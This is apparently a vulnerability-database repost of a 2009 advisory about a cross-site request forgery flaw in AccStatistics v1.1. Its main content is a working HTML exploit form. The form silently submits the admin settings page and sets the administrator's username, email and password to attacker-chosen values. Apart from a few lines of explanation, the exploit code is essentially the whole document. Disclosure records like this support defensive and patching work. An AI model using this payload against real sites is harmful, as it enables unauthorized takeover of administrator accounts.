AccStatistics 1.1 - CSRF Vulnerability (Change Admin Settings)

🗓️ 01 Jul 2014 00:00:00Reported by RootType
AccStatistics v1.1 CSRF Vulnerability, Change Admin Setting

                                                [-------------------------------------------------------------------------------------------------]
[   Title: AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings)                          ]
[   Author: Milos Zivanovic                                                                       ]
[   Date: 13. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: AccStatistics                                                                    ]
[   Version: v1.1                                                                                 ]
[   Download: http://www.accstatistics.com/download/accstatistics.zip                             ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I&#39;ve tested this on demo version where name attribute of submit button is &#39;preview&#39;. I doubt that&#39;s
the name in the real thing. I don&#39;t know what is the name tag of it but it&#39;s usually &#39;submit&#39; or
&#39;save&#39; (could be something other).

With this exploit we can change allot of stuff, but some of the most critical would be:
username, email, password...

[EXPLOIT------------------------------------------------------------------------------------------]
&#60;form action=&#34;http://localhost/accstatistics/demo/index.php&#34; method=&#34;POST&#34;&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;p&#34; value=&#34;edit1&#34;&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;id&#34; value=&#34;1&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_username&#34; name=&#34;input_username&#34; value=&#34;admin&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_email&#34; name=&#34;input_email&#34; value=&#34;[email protected]&#34;&#62;
  &#60;input type=&#34;password&#34; id=&#34;input_password&#34; name=&#34;input_password&#34; value=&#34;hacked&#34;&#62;
  &#60;input type=&#34;password&#34; id=&#34;input_password1&#34; name=&#34;input_password1&#34; value=&#34;hacked&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_sitename&#34; name=&#34;input_sitename&#34; value=&#34;AccStatistics&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_ignoredomains&#34; name=&#34;input_ignoredomains&#34; value=&#34;&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_ignoremyvisits&#34; name=&#34;input_ignoremyvisits&#34; value=&#34;1&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_ignoresubdomenins&#34; name=&#34;input_ignoresubdomenins&#34; value=&#34;1&#34;&#62;
  &#60;input type=&#34;hidden&#34; id=&#34;input_rowsperpage&#34; name=&#34;input_rowsperpage&#34; value=&#34;30&#34;&#62;
  &#60;input type=&#34;checkbox&#34; id=&#34;input_reset&#34; name=&#34;input_reset&#34; value=&#34;1&#34;&#62;
  &#60;input type=&#34;submit&#34; name=&#34;preview&#34; value=&#34;Save&#34;&#62;
&#60;/form&#62;

[EXPLOIT------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1